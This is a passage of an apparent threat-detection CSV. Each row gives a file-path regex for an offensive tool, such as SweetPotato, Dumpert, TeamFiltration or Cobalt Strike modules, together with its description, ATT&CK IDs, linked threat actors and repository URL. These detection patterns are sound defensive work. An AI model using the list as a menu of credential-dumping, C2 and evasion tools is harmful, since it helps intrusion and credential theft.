- T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\Sweetpotato.exe*",".{0,1000}\\Sweetpotato\.exe.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "*\SweetPotato\Program.cs*",".{0,1000}\\SweetPotato\\Program\.cs.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "*\SweetPotato-master.zip*",".{0,1000}\\SweetPotato\-master\.zip.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "*\swodniW\:C*",".{0,1000}\\swodniW\\\:C.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed strings","T1027 - T1059.001","TA0005 - TA0002","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*\sysDb-dmp*",".{0,1000}\\sysDb\-dmp.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","10","1","29","81","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z" "*\systemic.txt",".{0,1000}\\systemic\.txt","offensive_tool_keyword","cobaltstrike","Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/BOF-RegSave","1","1","N/A","10","10","177","30","2020-10-08T17:29:02Z","2020-10-07T13:46:03Z" "*\SysWhispersU.exe*",".{0,1000}\\SysWhispersU\.exe.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","9","10","1032","252","2024-04-11T01:25:28Z","2021-11-08T09:03:32Z" "*\TakeMyRDP*",".{0,1000}\\TakeMyRDP.{0,1000}","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","4","364","61","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z" "*\Tasks\bypass-clm*",".{0,1000}\\Tasks\\bypass\-clm.{0,1000}","offensive_tool_keyword","bypass-clm","PowerShell Constrained Language Mode Bypass","T1059.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/calebstewart/bypass-clm","1","0","N/A","8","3","202","33","2021-01-31T19:13:55Z","2021-01-29T04:46:23Z" "*\Tasks\lsass.dmp*",".{0,1000}\\Tasks\\lsass\.dmp.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\TASKSHELL.EXE*",".{0,1000}\\TASKSHELL\.EXE.{0,1000}","offensive_tool_keyword","cobaltstrike","tamper scheduled task with a binary","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/TaskShell","1","0","N/A","10","10","57","8","2021-02-15T19:23:13Z","2021-02-15T19:22:26Z" "*\Tater.ps1*",".{0,1000}\\Tater\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\TChopper\chopper.*",".{0,1000}\\TChopper\\chopper\..{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","9","1","49","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z" "*\Tchopper-main.zip*",".{0,1000}\\Tchopper\-main\.zip.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","9","1","49","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z" "*\TCPMITM.py*",".{0,1000}\\TCPMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*\TeamFiltration.dll*",".{0,1000}\\TeamFiltration\.dll.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*\TeamFiltration.exe*",".{0,1000}\\TeamFiltration\.exe.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*\TeamFiltration\OneDriveAPI*",".{0,1000}\\TeamFiltration\\OneDriveAPI.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*\TeamFiltration\TeamFiltration\*",".{0,1000}\\TeamFiltration\\TeamFiltration\\.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*\TeamFiltrationConfig_Example.json*",".{0,1000}\\TeamFiltrationConfig_Example\.json.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*\teams_dump.py*",".{0,1000}\\teams_dump\.py.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1555 - T1003 - T1114","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","0","N/A","9","2","121","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z" "*\teams_dump.py*",".{0,1000}\\teams_dump\.py.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1560.001 - T1555.003 - T1113 - T1557","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","0","N/A","7","2","121","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z" "*\teams_localdb.py*",".{0,1000}\\teams_localdb\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\teamserver-win.zip*",".{0,1000}\\teamserver\-win\.zip.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*\teamstracker.py*",".{0,1000}\\teamstracker\.py.{0,1000}","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","0","N/A","3","1","49","4","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" "*\Temp\cme_hosted*",".{0,1000}\\Temp\\cme_hosted.{0,1000}","offensive_tool_keyword","crackmapexec","CrackMapExec behavior","T1021 - T1048 - T1077 - T1087 - T1090 - T1135 - T1210","TA0001 - TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*\Temp\csrss.dmp*",".{0,1000}\\Temp\\csrss\.dmp.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" "*\temp\dump.txt*",".{0,1000}\\temp\\dump\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*\Temp\dumpert*",".{0,1000}\\Temp\\dumpert.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","0","N/A","N/A","10","1404","238","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" "*\temp\hollow.dll*",".{0,1000}\\temp\\hollow\.dll.{0,1000}","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","N/A","Network Exploitation Tools","https://github.com/skahwah/SQLRecon","1","0","N/A","N/A","6","569","107","2024-04-22T20:02:18Z","2021-11-19T15:58:49Z" "*\Temp\lsass.dmp*",".{0,1000}\\Temp\\lsass\.dmp.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" "*\temp\pwned.trx*",".{0,1000}\\temp\\pwned\.trx.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*\Temp\Reaper.exe*",".{0,1000}\\Temp\\Reaper\.exe.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","2","112","31","2024-03-01T14:36:32Z","2023-09-21T02:09:48Z" "*\Temp\RTCore64.sys*",".{0,1000}\\Temp\\RTCore64\.sys.{0,1000}","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","0","N/A","10","9","815","130","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" "*\Temp\tor\control-port-*",".{0,1000}\\Temp\\tor\\control\-port\-.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","0","N/A","9","10","N/A","N/A","N/A","N/A" "*\Temp\tor\torrc-*",".{0,1000}\\Temp\\tor\\torrc\-.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","0","N/A","9","10","N/A","N/A","N/A","N/A" "*\Temp\Wdlogfile.log*",".{0,1000}\\Temp\\Wdlogfile\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\Temp\whoami.txt*",".{0,1000}\\Temp\\whoami\.txt.{0,1000}","offensive_tool_keyword","crackmapexec","CrackMapExec behavior","T1021 - T1048 - T1077 - T1087 - T1090 - T1135 - T1210","TA0001 - TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*\Temp\whoami.txt*",".{0,1000}\\Temp\\whoami\.txt.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\Temp\WinAuditDB.accdb*",".{0,1000}\\Temp\\WinAuditDB\.accdb.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*\termsrv.patch.dll*",".{0,1000}\\termsrv\.patch\.dll.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file","T1112 - T1055 - T1562.001","TA0003 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","9","4","309","66","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "*\Test.PME",".{0,1000}\\Test\.PME","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\test_mitm_initialization.py*",".{0,1000}\\test_mitm_initialization\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*\TestNetConnectionCommand.cs",".{0,1000}\\TestNetConnectionCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\tests\beacon64.bin*",".{0,1000}\\tests\\beacon64\.bin.{0,1000}","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","0","N/A","10","10","941","169","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" "*\TGSThief\*",".{0,1000}\\TGSThief\\.{0,1000}","offensive_tool_keyword","TGSThief","get the TGS of a user whose logon session is just present on the computer","T1558 - T1558.003 - T1078 - T1078.005","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/MzHmO/TGSThief","1","0","N/A","9","2","146","22","2023-07-25T05:30:39Z","2023-07-23T07:47:05Z" "*\the-backdoor-factory\*",".{0,1000}\\the\-backdoor\-factory\\.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3252","785","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z" "*\Theif.dll*",".{0,1000}\\Theif\.dll.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "*\ThemeBleed.exe *",".{0,1000}\\ThemeBleed\.exe\s.{0,1000}","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gabe-k/themebleed","1","0","N/A","10","2","179","37","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z" "*\ThemeBleed.sln*",".{0,1000}\\ThemeBleed\.sln.{0,1000}","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gabe-k/themebleed","1","0","N/A","10","2","179","37","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z" "*\TheThing.exe*",".{0,1000}\\TheThing\.exe.{0,1000}","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","0","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*\thread-injector.exe*",".{0,1000}\\thread\-injector\.exe.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","1","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*\Throwback.exe*",".{0,1000}\\Throwback\.exe.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","N/A","10","10","304","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z" "*\Throwback\Throwback.h*",".{0,1000}\\Throwback\\Throwback\.h.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","N/A","10","10","304","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z" "*\ThrowbackDLL\*",".{0,1000}\\ThrowbackDLL\\.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","N/A","10","10","304","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z" "*\Throwback-master.zip*",".{0,1000}\\Throwback\-master\.zip.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","N/A","10","10","304","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z" "*\ticket_converter.py*",".{0,1000}\\ticket_converter\.py.{0,1000}","offensive_tool_keyword","ticket_converter","A little tool to convert ccache tickets into kirbi (KRB-CRED) and vice versa based on impacket.","T1558.003 - T1110.004","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/zer1t0/ticket_converter","1","1","N/A","10","2","163","31","2022-06-16T19:38:05Z","2019-05-14T04:48:19Z" "*\Tickets\KerbDump*",".{0,1000}\\Tickets\\KerbDump.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\TikiCompiler.txt*",".{0,1000}\\TikiCompiler\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - 